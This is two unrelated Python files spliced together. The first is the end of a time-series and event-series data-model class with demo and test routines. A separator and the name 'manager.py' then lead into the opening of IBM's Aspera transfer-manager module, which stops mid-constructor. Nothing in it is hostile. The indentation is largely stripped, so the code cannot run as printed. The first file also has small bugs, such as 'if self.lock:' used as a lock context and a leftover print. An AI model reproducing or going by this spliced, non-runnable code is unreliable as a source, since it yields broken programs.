data = self.event_series_get(desc)
takeIndices = numpy.full(len(times),True)
for idx,tim in enumerate(times):
duplicates = numpy.where(data["__time"]==tim)[0]
for pos in duplicates:
if numbers[idx] == data["values"][pos]:
takeIndices[idx] = False
numbers = numbers[takeIndices]
epochs = epochs[takeIndices]
with self.lock:
#on the TimeSeries class the allowDuplicates means that the same time can appear multiple times
# such that different or the same events can happen at the same time and thus produce the same
# time stamp in the time series
result = self.ts.insert(id,numbers, epochs, allowDuplicates=True)# we allow 2 events to appear on the same time!
self.__notify_observers(id, "value")
return result
def event_series_set(self,desc,values=None,times=None):
id = self.get_id(desc)
if not id in self.model:
return None
if self.lock:
# now "refresh" the event map
#self.model[id]["eventMap"]={}
numbers = [self.event_series_get_event_number(id, event) for event in values]
result = self.ts.set(id,values=numbers,times=times)
self.__notify_observers(id, "value")
return result
def event_series_get(self,desc, start=None,end=None,format="default",eventFilter=None):
"""
get events from a event series
Args:
desc: node descriptor
start , end [float]:
the start and endtime of the table given as seconds since epoch
we also allow the special case of endTime = 0 and startTime = -interval
we also allow the special case of startTime given and end time= 0
format: [enum] "default"
eventFilter : [string] a list of eventStrings as positive match filter
toList: (bool) True: return data as python list, False: return numpy arrays
examples:
- get all data of the variables
data = m.get_time_series_table(["root.mytable.variables.a","root.mytable.variables.b"]) # get all data
- request max 300 values of data (this is what the UI does)
data = m.get_time_series_table(["a","b"],"root.mytable",start=1581483065.323,end=1581483080.323,noBins=300,includeIntervalLimits=True)
- request data and resample to equiditant 25 sec spacing, also fill possible nan values with interpolation
times = list(range(1581483065,1581483065+100,25))
data = m.get_time_series_table(["a","b"],"root.mytable",resampleTimes = times,resampleMethod = "linearfill")
Returns(dict)
formatting depends on the "format" option
"defaut": return the result as {"values":[],"__time":[], "eventstrings": "map":{1:"myevent",2:"anotherevent"}
"""
id = self.get_id(desc)
if not id:
return None
data = self.ts.get_table([id], start=start, end=end)
if data == {}:
#this variable is not in the store
data = {id:{"values":numpy.asarray([]),"__time":numpy.asarray([])}}
eventMap = self.model[id]["eventMap"].copy()
reverseMap = {v:k for k,v in eventMap.items()}
values = data[id]["values"].astype(numpy.int)
times = data[id]["__time"]
#now filter
if eventFilter:
filter = []
if type(eventFilter) is not list:
eventFilter = [eventFilter]
for evString in eventFilter:
if evString in eventMap:
filter.append(eventMap[evString])
indices = [idx for idx,val in enumerate(values) if val in filter]
values = values[indices]
times = times[indices]
result = {
"values":values,
"__time":times,
"eventMap":eventMap,
"eventStrings":[reverseMap[v] for v in values]
}
if format == "iso":
#convert the timestamps to iso
result["__time"]=[epochToIsoString(t) for t in result["__time"]]
if format == "events":
existingEvents = set(result["values"])
events = {reverseMap[ev]:[] for ev in existingEvents}
for ev,ti in zip(result["values"],result["__time"]):
events[reverseMap[ev]].append(ti)
result["events"]=events
del result["values"]
del result["__time"]
del result["eventStrings"]
return result
def event_series_insert_blob(self,blob):
"""
insert events in various blob syntax
Args:
desc: the node descriptor
blob: a dictionary in various styles
a) {
"node": nodedescriptor,
"events": "startMachine",
"__time": ["2018.01.01T00:10:08.445+02:00",1546437120.2,1546437121.2,1546437122.2] # allows iso or epoch
}
b) {
"node": nodedescriptor,
"events": ["startMachine","stopMachine","startMachine","startMachine"],
"__time": ["2018.01.01T00:10:08.445+02:00",1546437120.2,1546437121.2,1546437122.2] # allows iso or epoch
}
c) {
"node": nodedescriptor,
"events": [
{"event":"startMachine",
"__time":"2018.01.01T00:10:08.445+02:00"
},
{"event":"stopMachine",
"__time":"2018.01.01T00:10:08.445+02:00"
}
]
}
Returns
true/false for success
"""
if type(blob["events"]) is not list:
#style a)
events = blob["events"]
times = blob["__time"]
else:
#events is a list
if type(blob["events"][0]) is dict:
#style c)
events = []
times = []
for d in blob["events"]:
events.append(d["event"])
times.append(d["__time"])
else:
#style b)
events = blob["events"]
times = blob["__time"]
return self.event_series_insert(blob["node"],events,times)
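    # For illustration, style b) of the blob format described above could look like this
    # (hypothetical node path, shown as comments only):
    #
    #   blob = {
    #       "node": "root.machine.events",
    #       "events": ["startMachine", "stopMachine"],
    #       "__time": ["2018.01.01T00:10:08.445+02:00", 1546437120.2],
    #   }
    #   m.event_series_insert_blob(blob)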
def event_series_delete(self,desc,start=None, end = None, eventsToDelete=[]):
id = self.get_id(desc)
if not id:
return None
if start == None and end == None and eventsToDelete == []:
#delete all
with self.lock:
self.model[id]["eventMap"]={}
result = self.ts.set(id, values=[], times=[])
else:
#delete some events
with self.lock:
data = self.ts.get_table([id])
if not start:
start = 0
if not end:
end = numpy.inf
times = data[id]["__time"]
values = data[id]["values"]
over = times>=start
under = times<=end
deleteMaskTime = over & under
if eventsToDelete == []:
deleteMaskValues = numpy.full(len(deleteMaskTime),True)
else:
deleteMaskValues = numpy.full(len(deleteMaskTime),False)
for ev in eventsToDelete:
evNumber = self.model[id]["eventMap"][ev]
mask = values == evNumber
deleteMaskValues = deleteMaskValues | mask
deleteMask = deleteMaskTime & deleteMaskValues
times = times[~deleteMask]
values = values[~deleteMask]
self.event_series_set(id,values,times)
print(data)
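    # For illustration (hypothetical node path): delete only the "start" events inside a window,
    # or call event_series_delete(desc) without further arguments to clear the whole series:
    #
    #   m.event_series_delete("root.machine.events", start=1546437000.0, end=1546438000.0,
    #                         eventsToDelete=["start"])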
def get_object(self,desc):
id = self.get_id(desc)
if not id:
return False
with self.lock:
if not self.model[id]["type"] == "object":
return None
if "object" not in self.model[id]:
return None
return self.model[id]["object"]
def instantiate_object(self,desc,writeToModel=True):
id = self.get_id(desc)
if not id:
return False
with self.lock:
if not self.model[id]["type"] == "object":
return False
try:
className = self.model[id]["class"]
if "autoReload" in self.model[id] and self.model[id]["autoReload"]==True and self.global_auto_reload_enabled():
# must reload the module
module = importlib.reload(self.objectClasses[className]["module"])
classDefinition = getattr(module, className.split('.', 1).pop())
# now update our global list
self.objectClasses[className]["module"] = module
self.objectClasses[className]["class"] = classDefinition
classDefinition = self.objectClasses[className]["class"]
object = classDefinition(self.get_node(id)) #instantiate the object
if writeToModel:
self.model[id]["object"]=object
return object
except:
self.log_error()
return None
def instantiate_all_objects(self):
with self.lock:
#make a list first for iteration, we can't iterate over the model,
# as the instantiation of object might produce new nodes while we iterate
objects = [k for k,v in self.model.items() if v["type"] == "object"]
for id in objects:
try:
self.instantiate_object(id)
except:
self.log_error()
def reset_all_objects(self):
with self.lock:
            # make a list first for iteration; we can't iterate over the model directly,
            # as resetting an object might produce new nodes while we iterate
objects = [k for k,v in self.model.items() if v["type"] == "object"]
for id in objects:
try:
self.get_object(id).reset(None)
except:
self.log_error()
def global_auto_reload_enabled(self):
if self.get_value("root.system.enableAutoReload") == False:
return False
else:
            return True  # this is also the case if the node is not there, as get_value returns None then
def create_test(self,testNo=1):
"""
        this function creates tests for demonstration purposes
"""
if testNo == 1:
self.create_node("root",name="variables",type="folder")
for var in ["f0","f1","f2","f3","count","time","back"]:
self.create_node("root.variables",name=var,type="column")
self.create_node_from_path('root.folder2.myconst',{"type":"const","value":"21data"})
self.create_node_from_path('root.folder2.myfkt', {"type": "function"})
#for the visu
self.create_node_from_path('root.visualization.pipelines.occupancy.url',{"type":"const","value":"http://localhost:5006/bokeh_web"})
self.create_node_from_path('root.visualization.pipelines.demo2.url',{"type":"const","value":"http://21data.io"})
#create an official table
template = [
{
"name": "description",
"type": "const",
"value": "this is a great table"
},
{
"name": "columns",
"type": "referencer",
},
{
"name": "timeField",
"type": "referencer",
},
{
"name": "numberOfRows",
"type": "variable",
"value": 0
}
]
self.create_node("root", name="mytable", type="table")
self.create_nodes_from_template("root.mytable", template=template)
for var in ["f0","f1","f2","f3","time","back"]:
self.add_forward_refs("root.mytable.columns",["root.variables."+var])
self.add_forward_refs("root.mytable.timeField", ["root.variables.time"])
#add data
startTime=datetime.datetime(2018,1,1,0,0,0,tzinfo=pytz.UTC)
vars={"f0":0.01,"f1":0.02,"f2":0.04,"f3":0.1,"back":0.01}
SIZE = 10*60 # in seconds units
STEP = 0.1
#!!! we are producing size/step time points
""" for i in range(SIZE):
dataDict = {}
for var in vars:
value = numpy.cos(2*numpy.pi*vars[var]*i/SIZE*3)
dataDict["root.variables."+var]=value
mytime = startTime + datetime.timedelta(seconds = i)
dataDict["root.variables.time"] = mytime
#print(mytime)
self.add_timeseries(dataDict)
"""
startEpoch = date2secs(startTime)
times = numpy.arange(startEpoch,startEpoch+SIZE,STEP,dtype=numpy.float64)
print("we have time:",times.shape)
for var in vars:
values = numpy.cos(2*numpy.pi*vars[var]*times)
id=self.get_id("root.variables."+str(var))
if var =="back":
#we make -1,0,1 out of it
values = numpy.round(values)
self.model[id]["value"]=values.tolist()
id = self.get_id("root.variables.time")
self.model[id]["value"]=(times).tolist()
#now correct the background
#now make some widget stuff
self.create_node_from_path('root.visualization.widgets.timeseriesOne',{"type":"widget"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.selectableVariables',
{"type":"referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.selectedVariables',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.startTime',
{"type": "variable","value":None})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.endTime',
{"type": "variable","value":None})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.bins',
{"type": "const","value":300})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation',
{"type": "const", "value": True})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasSelection',
{"type": "const", "value": False})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.annotations',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.newAnnotations',
{"type": "folder"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.tags',
{"type": "const","value":["one","two"]})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.colors',
{"type": "const","value":["yellow","brown","greay","green","red"]})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.table',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.lineColors',
{"type": "const", "value": ["blue", "yellow", "brown", "grey", "red"]})
self.add_forward_refs('root.visualization.widgets.timeseriesOne.selectedVariables',['root.variables.f0','root.variables.f1','root.variables.f3'])
self.add_forward_refs('root.visualization.widgets.timeseriesOne.selectableVariables',['root.variables'])
self.add_forward_refs('root.visualization.widgets.timeseriesOne.table',['root.mytable'])
self.create_node_from_path('root.visualization.widgets.timeseriesOne.observer',{"type":"referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.observerUpdate', {"type": "const","value":["line","background","annotations"]})
#now the annotations
anno = [
{
"name": "tags",
"type": "const",
"value": ["one","two"]
},
{
"name": "startTime",
"type": "const",
"value": None
},
{
"name": "endTime",
"type": "const",
"value": None
},
{
"name": "text",
"type": "const",
"value": "this is a great annotation"
}
]
tags=["one","two","one","one","two","two","one","one","one","two","one","one"]
self.create_node_from_path("root.annotations",{"type":"folder"})
startTime = datetime.datetime(2018, 1, 1, 0, 0, 0, tzinfo=pytz.UTC)
for i in range(10):
newAnno = copy.deepcopy(anno)
newAnno[1]["value"] = (startTime + datetime.timedelta(minutes=(i*10))).isoformat()
newAnno[2]["value"] = (startTime + datetime.timedelta(minutes=(i*10+1))).isoformat()
newAnno[0]["value"] = [tags[i],tags[i+1]]
newAnnoPath = "root.annotations.anno"+str(i)
self.create_node_from_path(newAnnoPath,{"type":"annotation"})
self.create_nodes_from_template(newAnnoPath,newAnno)
#also add the annotations to the widget
self.add_forward_refs("root.visualization.widgets.timeseriesOne.hasAnnotation.annotations",["root.annotations","root.visualization.widgets.timeseriesOne.hasAnnotation.newAnnotations"])
#make a real function
self.create_node_from_path("root.functions",{"type":"folder"})
self.create_nodes_from_template("root.functions",[self.templates["testfunction.delayFunctionTemplate"]])
            # now make a custom function to trigger something
self.create_nodes_from_template("root.functions",[self.templates["counterfunction.counterFunctionTemplate"]])
#now hook the function output to the observer of the plot
self.add_forward_refs('root.visualization.widgets.timeseriesOne.observer',['root.functions.counterFunction.output'])
#now make custom buttons
buttons = [
{
"name":"button1",
"type":"folder",
"children":[
{"name":"caption","type":"const","value":"start learner"},
{"name":"counter", "type": "variable", "value":0},
{"name": "onClick", "type": "referencer"}
]
}
]
self.create_node_from_path("root.visualization.widgets.timeseriesOne.buttons",{"type":"folder"})
self.create_nodes_from_template("root.visualization.widgets.timeseriesOne.buttons",buttons)
self.add_forward_refs("root.visualization.widgets.timeseriesOne.buttons.button1.onClick",["root.functions.counterFunction"])
#now the backgrounds
self.create_node_from_path("root.visualization.widgets.timeseriesOne.hasBackground",{"type":"const","value":True})
self.create_node_from_path("root.visualization.widgets.timeseriesOne.background",{"type":"referencer"})
self.add_forward_refs("root.visualization.widgets.timeseriesOne.background",["root.variables.back"])
self.create_node_from_path("root.visualization.widgets.timeseriesOne.backgroundMap",{"type":"const","value":{"1":"red","0":"green","-1":"blue","default":"white"}})
self.show()
elif testNo == 2:
#we take the full test number 1 and rearrange some things
self.create_test(1)
self.currentModelName = "occupancydemo"
import data.occupancy_data.occupancy as occ
occData = occ.read_occupancy("./data/occupancy_data/datatest2.txt")
#create an official table
template = [
{
"name": "description",
"type": "const",
"value": "this is the occupancy data table"
},
{
"name": "columns",
"type": "referencer",
},
{
"name": "timeField",
"type": "referencer",
},
{
"name": "variables",
"type": "folder",
}
]
self.create_node("root", name="occupancy", type="table")
self.create_nodes_from_template("root.occupancy", template=template)
for var in occData:
path = "root.occupancy.variables."+var
self.create_node_from_path(path,{"type":"column"})
self.set_value(path,occData[var])
self.add_forward_refs("root.occupancy.columns",[path])
self.add_forward_refs("root.occupancy.timeField",["root.occupancy.variables.date"])
#now create the classification
self.create_node("root.occupancy", name="classification", type="column")
self.set_value("root.occupancy.classification", [0]*len(occData[list(occData.keys())[0]]))
self.add_forward_refs("root.occupancy.columns", ["root.occupancy.classification"])
#create another TS-widget
self.create_node_from_path('root.visualization.widgets.timeseriesOccupancy', {"type": "widget"})
self.create_nodes_from_template('root.visualization.widgets.timeseriesOccupancy',modeltemplates.timeseriesWidget)
self.create_nodes_from_template('root.visualization.widgets.timeseriesOccupancy.buttons.button1',modeltemplates.button)
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.selectedVariables',["root.occupancy.variables.Temperature"])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.selectableVariables',["root.occupancy.variables"])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.table',['root.occupancy'])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.background',['root.occupancy.classification'])
self.set_value('root.visualization.widgets.timeseriesOccupancy.backgroundMap', {"0": "brown", "1": "yellow", "-1": "blue", "default": "white"}) #match annotation colors
#self.set_value('root.visualization.widgets.timeseriesOccupancy.backgroundMap', {"0": "blue", "1": "black", "-1": "blue", "default": "white"}) #match annotation colors
self.set_value('root.visualization.widgets.timeseriesOccupancy.hasAnnotation.tags',["busy","free"])
#now create the logistic regression
self.create_nodes_from_template('root',[self.templates["logisticregression.logisticRegressionTemplate"]])
self.add_forward_refs('root.logisticRegression.input',['root.occupancy.variables.Temperature', 'root.occupancy.variables.Light','root.occupancy.variables.CO2'])
self.add_forward_refs('root.logisticRegression.output', ['root.occupancy.classification'])
self.add_forward_refs('root.logisticRegression.annotations',['root.visualization.widgets.timeseriesOccupancy.hasAnnotation.newAnnotations'])
self.set_value('root.logisticRegression.categoryMap', {"busy": 1, "free": 0})
#also hook the button on it
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.buttons.button1.onClick',['root.logisticRegression'])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.observer',['root.logisticRegression.executionCounter']) # observe the execution of the scorer
self.show()
elif testNo == 3:
# make some nodes
for id in range(10):
self.create_node_from_path("root.add.var"+str(id), {"type": "variable", "value": id+100})
for id in range(100):
self.create_node_from_path("root.remove.var"+str(id), {"type": "variable", "value": id+100})
self.create_node_from_path("root.change_name_one")
self.create_node_from_path("root.change_value")
self.create_node_from_path("root.move.first")
self.create_node_from_path("root.move.second")
self.create_node_from_path("root.refs",properties={"type":"referencer"})
self.add_forward_refs("root.refs",["root.move.first","root.move.second","root.move"])
#now start a thread that changes the tree periodically
def __update_tree():
while True:
time.sleep(3.0)
with self.lock:
self.logger.debug("__update_tree")
self.create_node_from_path("root.add.dyn"+str(uuid.uuid4()))
removeFolder = self.get_id("root.remove")
if self.model[removeFolder]["children"]:
self.delete_node(self.model[removeFolder]["children"][0])
id = self.get_id("root.change_name_one")
if id:
self.model[id]["name"]="change_name_two"
else:
id = self.get_id("root.change_name_two")
self.model[id]["name"]="change_name_one"
id = self.get_id("root.move")
self.model[id]["children"].reverse()
id=self.get_id("root.refs")
self.model[id]["forwardRefs"].reverse()
self.set_value("root.change_value",int(uuid.uuid4())%100)
self.testThread = threading.Thread(target=__update_tree)
self.testThread.start()
if __name__ == '__main__':
def test1():
m=Model()
m.create_node("root",name="folder1")
m.create_node("root.folder1",name="folder2")
m.create_node("2",name="second")
m.create_node("root",name="myreferencer",type="referencer")
m.create_node("root.folder1",name="myvar",type="variable")
m.set_value("root.folder1.myvar",44.5)
m.add_forward_refs("root.myreferencer",["root.folder1"])
m.add_property("root.folder1.folder2","uasource","192.168.5.6")
m.show()
m.get_model()
m.delete_node("root.myreferencer")
return m
def test_template():
m=Model()
template = {
"myfunction": {
"type": "function",
"value": "someValue",
"opcua":"opc.tcp://129.160.1.1:4880::n2=2;s=mystrin"
},
"myreferencer": {
"type": "referencer",
"forwardRefs": ['.myfolder.var1', '.myfolder.var2', '.myfolder.var3']
},
"myfolder": {
"type": "folder",
"children": {
"var1": {"type": "const", "value": "1"},
"var2": {"type": "variable"},
"var3": {"type": "timeseries"},
}
},
}
m.create_nodes_from_template(template=template)
m.show()
def save_test():
print("save and load test")
m=Model()
m.create_test()
m.save("savetest")
n=Model()
n.load("savetest")
if len(n.get_model())!= len(m.get_model()):
print("unequal size")
return False
#now compare
mModel = m.get_model()
nModel = n.get_model()
for nodeId in mModel:
#print("check",nodeId)
try:
if nModel[nodeId]!=mModel[nodeId]:
print("unequal before after ",nodeId,m[nodeId],n[nodeId])
return False
except:
print("cant find",nodeId)
return False
print("savetest passed")
return True
def plugintest():
m=Model()
m.create_node("root", name="folder1")
m.create_nodes_from_template("root.folder1",m.templates["testfunction.delayFunctionTemplate"])
m.show()
m.execute_function("root.folder1.delayFunction")
statusNode = m.get_node("root.folder1.delayFunction.status")
progressNode = m.get_node("root.folder1.delayFunction.progress")
while(statusNode.get_value()!="finished"):
print("progress is",progressNode.get_value())
time.sleep(0.3)
print("execution re===================")
m.show()
def getnodetest():
m=Model()
m.create_node("root", name="folder1")
m.create_node("root.folder1", name="folder2")
m.create_node("root.folder1", name="myvar", type="variable")
myvar = m.get_node("root.folder1.myvar")
myvar.set_value(33)
print("value",myvar.get_value())
def testfunctions_test():
m = Model()
m.create_test(1)
m.show()
table= m.get_timeseries_table(["root.variables.f0","root.variables.f1","root.variables.time"],noBins=25)
print("shape",table.shape)
for row in table.T:
for elem in row:
print(str("%3.7f"%elem)," ",end="")
print("")
def time_conver_test():
d1=datetime.datetime(2018,1,1,0,0,0,tzinfo = pytz.UTC)
print(d1)
s1 = date2secs(d1)
print(s1)
d2 = secs2date(s1)
print(d2)
d3 ="2018-01-01T00:10:08.445+02:00"
print(d3)
d4=dateutil.parser.parse(d3)
print(d4)
s4=date2secs(d4)
print(s4)
d5=secs2date(s4)
print(d5)
def table_test():
m=Model()
print("this test creates a table and writes some data in")
template = [
{
"name": "type",
"type": "const",
"value": "timeSeriesTable"
},
{
"name":"description",
"type": "const",
"value": "this is a great table"
},
{
"name":"data",
"type":"folder",
"children":[
{"name":"var1","type": "column","value":[]},
{"name":"var2","type": "column","value":[]},
{"name":"var3","type": "column","value":[]},
{"name":"time","type": "column","value":[]}
]
},
{
"name":"columns",
"type": "referencer",
"forwardRefs": ['.data.var1', '.data.var2', '.data.var3',".data.time"]
},
{
"name":"timeField",
"type": "referencer",
"forwardRefs":['.data.time']
},
{
"name": "numberOfRows",
"type": "variable",
"value":0
}
]
m.create_node("root", name="mytable",type="table")
m.create_nodes_from_template("root.mytable",template=template)
m.show()
#now write some data with autocreates
mytime = datetime.datetime.now(pytz.timezone("CET"))
myepoch=date2secs(mytime)
blob = {"root.mytable.data.var1":1,"root.mytable.data.var2":2,"root.mytable.data.time":myepoch,"root.mytable.data.newvar":99}
m.append_table(blob)
m.show()
#now add more data but leave out var
blob = {"root.mytable.data.var1": 10, "root.mytable.data.var2": 20, "root.mytable.data.time": myepoch}
m.append_table(blob)
blob = {"root.mytable.data.var1": 10, "root.mytable.data.var2": 20, "root.mytable.data.var4": 4, "root.mytable.data.time": myepoch}
m.append_table(blob)
m.show()
def test_table_autocreate():
mytime = datetime.datetime.now(pytz.timezone("CET"))
myepoch=date2secs(mytime)
blob = {"root.data.var1":1,"root.data.var2":2,"root.folder.time":myepoch,"root.data.newvar":99}
m=Model()
m.append_table(blob)
m.show()
def test_create_from_path():
m=Model()
m.create_node_from_path("root.myfolder.myfolder2.var",{"type":"variable","value":33})
m.show()
def test_get_children():
m=Model()
m.create_test()
nodes = m.get_node_with_children('root.folder2')
#lastnode = '10'
#print(m.get_path(lastnode))
print(json.dumps(nodes,indent=4))
def test_create():
m=Model()
m.create_test(1)
m.show()
def test_get_forwards():#
#in this test, we check the forwards get results over folders, referencers etc.
m=Model()
m.create_node_from_path("root.folder.var1",{"type":"variable"})
m.create_node_from_path("root.folder.var2", {"type": "variable"})
m.create_node_from_path("root.folder.var3", {"type": "variable"})
m.create_node_from_path("root.ref1", {"type": "referencer"})
m.create_node_from_path("root.ref2", {"type": "referencer"})
m.add_forward_refs("root.ref1",["root.folder"])
m.add_forward_refs("root.ref2", ["root.ref1"])
m.show()
res=m.get_leaves("root.ref1")
print(res)
for k in res:
print(k["name"])
res = m.get_leaves("root.ref2")
for k in res:
print(k["name"])
def pickle_save():
import pickle
m=Model()
m.create_test(2)
# write python dict to a file
output = open('pickle_save.pkl', 'wb')
pickle.dump(m.get_model(), output)
output.close()
n=Model()
# read python dict back from the file
pkl_file = open('pickle_save.pkl', 'rb')
restore = pickle.load(pkl_file)
pkl_file.close()
print("compare after pickle restre",restore==m.get_model())
if __name__ == '__main__':
#############
#test1()
#ts_test1()
#test_template()
save_test()
pickle_save()
#plugintest()
#getnodetest()
#table_query_test()
#testfunctions_test()
#time_conver_test()
#test_create_from_path()
#table_test()
#test_table_autocreate()
#test_get_children()
#test_get_forwards()
#test_create()
    # read in the command line options:
    # demo1: create the test for demo1 and store it in a file given as the second argument
#
if len(sys.argv) > 1:
if sys.argv[1] == "demo1":
fileName = sys.argv[2]
print("creating demo and save as ",fileName)
m = Model()
m.create_test()
m.show()
            m.save(fileName)
|
manager.py
|
# Copyright 2018 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import time
import json
import requests
import logging
import uuid
import six
import threading
from collections import OrderedDict
from collections import deque
from ibm_s3transfer.manager import TransferCoordinatorController
from ibm_s3transfer.futures import TransferMeta
from ibm_s3transfer.utils import CallArgs
from ibm_botocore.client import BaseClient
from ibm_botocore.credentials import DelegatedTokenManager
from ibm_s3transfer.exceptions import CancelledError
from ibm_s3transfer.exceptions import FatalError
from ibm_s3transfer.aspera.exceptions import AsperaTransferQueueError
from ibm_s3transfer.aspera.futures import AsperaTransferCoordinator
from ibm_s3transfer.aspera.futures import AsperaTransferFuture
from ibm_s3transfer.aspera.futures import enumAsperaDirection
from ibm_s3transfer.aspera.subscribers import AsperaBaseSubscriber
from ibm_s3transfer.aspera.utils import check_io_access, FilePair
try:
from functools import lru_cache
except ImportError:
from backports.functools_lru_cache import lru_cache
logger = logging.getLogger("ibmcos.aspera")
RECEIVER_CLIENT_IDS = 'aspera_ats'
class AsperaConfig(object):
''' AsperaConfig - Configurations used to update the Aspera transfer spec
which controls how a file is transferred '''
def __init__(self,
target_rate_mbps=None,
target_rate_cap_mbps=None,
min_rate_cap_mbps=None,
min_rate_mbps=None,
rate_policy=None,
lock_min_rate=None,
lock_target_rate=None,
lock_rate_policy=None,
multi_session=None,
multi_session_threshold_mb=None,
destination_root=None):
"""Configuration for the Aspera Uploads and Downloads
:param target_rate_mbps:
Integer: The desired speed of the transfer. If there is competing network traffic,
fasp may share this bandwidth, depending on the rate_policy.
:param target_rate_cap_mbps:
Integer: The maximum target rate for transfers that are authorized
by this access key,in kilobits per second.
:param min_rate_cap_mbps:
:param min_rate_mbps:
Integer: The minimum speed of the transfer. fasp
will only share bandwidth exceeding this value.
Note: This value has no effect if rate_policy is "fixed".
:param rate_policy:
fixed: Transfer at the target rate, regardless of the
actual network capacity. Do not share bandwidth.
high: When sharing bandwidth, transfer at twice the rate of a transfer
using a "fair" policy.
fair (default): Share bandwidth equally with other traffic.
low: Use only unutilized bandwidth
:param lock_min_rate:
True/False: Prevents the user from changing the minimum rate during a transfer.
:param lock_target_rate:
True/False: Prevents the user from changing the target rate during a transfer.
:param lock_rate_policy:
True/False: Prevents the user from changing the rate policy during a transfer.
:param multi_session:
Integer: The number of sessions to use to transfer a file or folder
            'all': if specified, multiple remote IPs are used (if configured) in the transfer
:param multi_session_threshold_mb:
Integer: The MegaByte threshold size at which a single file can be split
and transferred by multiple sessions
                Note: If the value is below 60 MB, it is ignored
:param destination_root:
The transfer destination file path. If destinations are specified in paths,
this value is prepended to each destination
"""
self._dict = {}
self.store("multi_session_threshold_mb", multi_session_threshold_mb, int,
"multi_session_threshold", 1000000, [60])
self.store("target_rate_mbps", target_rate_mbps, int,
"target_rate_kbps", 1000)
self.store("target_rate_cap_mbps", target_rate_cap_mbps, int,
"target_rate_cap_kbps", 1000)
self.store("min_rate_cap_mbps", min_rate_cap_mbps, int,
"min_rate_cap_kbps", 1000)
self.store("min_rate_mbps", min_rate_mbps, int,
"min_rate_kbps", 1000)
self.store("rate_policy", rate_policy, str,
allowed_values=['fixed', 'high', 'fair', 'low'])
self.store("lock_min_rate", lock_min_rate, bool)
self.store("lock_target_rate", lock_target_rate, bool)
self.store("lock_rate_policy", lock_rate_policy, bool)
self.store("multi_session", multi_session, int,
allowed_values=['all'])
self.store("destination_root", destination_root, str)
def store(self, name, value, atype, new_name=None, multiplier=None, allowed_values=None):
        ''' store a config value in a dictionary; these values are used to populate a transfer spec
            validation -- check type, check allowed values and rename if required '''
if value is not None:
_bad_type = (not isinstance(value, atype))
if not _bad_type:
# special case
_bad_type = (isinstance(value, bool) and atype == int)
if _bad_type:
# could be a special value
if allowed_values and value in allowed_values:
allowed_values = None
else:
raise ValueError("%s should be value of type (%s)" % (name, atype.__name__))
if allowed_values:
if isinstance(value, str):
if value not in allowed_values:
raise ValueError("%s can be %s" % (name, allowed_values))
elif isinstance(value, int):
if isinstance(allowed_values[0], int):
if value < allowed_values[0]:
raise ValueError("%s must be >= %d" % (name, allowed_values[0]))
_val = value if not multiplier else (multiplier * value)
_name = name if not new_name else new_name
self._dict[_name] = _val
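    # For illustration: store("target_rate_mbps", 100, int, "target_rate_kbps", 1000) checks
    # that 100 is an int, multiplies it by 1000 and stores it under the renamed key, so that
    # afterwards self._dict["target_rate_kbps"] == 100000.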
@property
def dict(self):
        ''' get the config values stored in a dictionary '''
return self._dict
@property
def multi_session(self):
        ''' convert the multi_session param to a number '''
_val = 0
if "multi_session" in self._dict:
_val = self._dict["multi_session"]
if str(_val).lower() == 'all':
_val = -1
return int(_val)
@property
def is_multi_session_all(self):
''' is the multi_session param set to all '''
return self.multi_session == -1
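# A minimal sketch of how an AsperaConfig might be built (the values are illustrative only):
#
#   transfer_config = AsperaConfig(target_rate_mbps=1000,
#                                  rate_policy='fair',
#                                  multi_session=2,
#                                  multi_session_threshold_mb=100)
#   transfer_config.dict           # transfer-spec fields, e.g. target_rate_kbps == 1000000
#   transfer_config.multi_session  # == 2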
class AsperaManagerConfig(object):
    ''' AsperaManagerConfig - Configurations for the Aspera transfer manager '''
def __init__(self,
max_submission_queue_size=100,
ascp_max_concurrent=10,
ascp_log_path=None,
max_fasp_cache_size=1000,
verify_ssl=True):
"""Configuration for the Aspera Manager
:param max_submission_queue_size:
            The maximum number of AsperaTransferManager method calls that can be queued at a time.
:param ascp_max_concurrent:
The maximum number of ascp sub processes that can be running at a time.
:param ascp_log_path:
            The path where Aspera transfer logs are written to.
:param max_fasp_cache_size:
"""
self.max_submission_queue_size = max_submission_queue_size
self.ascp_max_concurrent = ascp_max_concurrent
self.ascp_log_path = ascp_log_path
self.max_fasp_cache_size = max_fasp_cache_size
self.verify_ssl = verify_ssl
class AsperaTransferManager(object):
''' AsperaTransferManager - a class to manage upload/downloads using the Aspera sdk '''
def __init__(self, client, config=None, transfer_config=None, delegated_token_manager=None):
assert(isinstance(client, BaseClient))
if config:
assert (isinstance(config, AsperaManagerConfig))
if transfer_config:
assert (isinstance(transfer_config, AsperaConfig))
self._client = client
self._transfer_config = transfer_config
self._config = config
if not self._config:
self._config = AsperaManagerConfig()
if self._config.ascp_log_path:
AsperaTransferManager.set_log_details(self._config.ascp_log_path)
self._coordinator_controller = AsperaTransferCoordinatorController(self._config)
# Aspera metadata caching function
self._get_aspera_metadata = (
lru_cache(maxsize=self._config.max_fasp_cache_size)(self._raw_aspera_metadata))
if delegated_token_manager:
self._delegated_token_manager = delegated_token_manager
else:
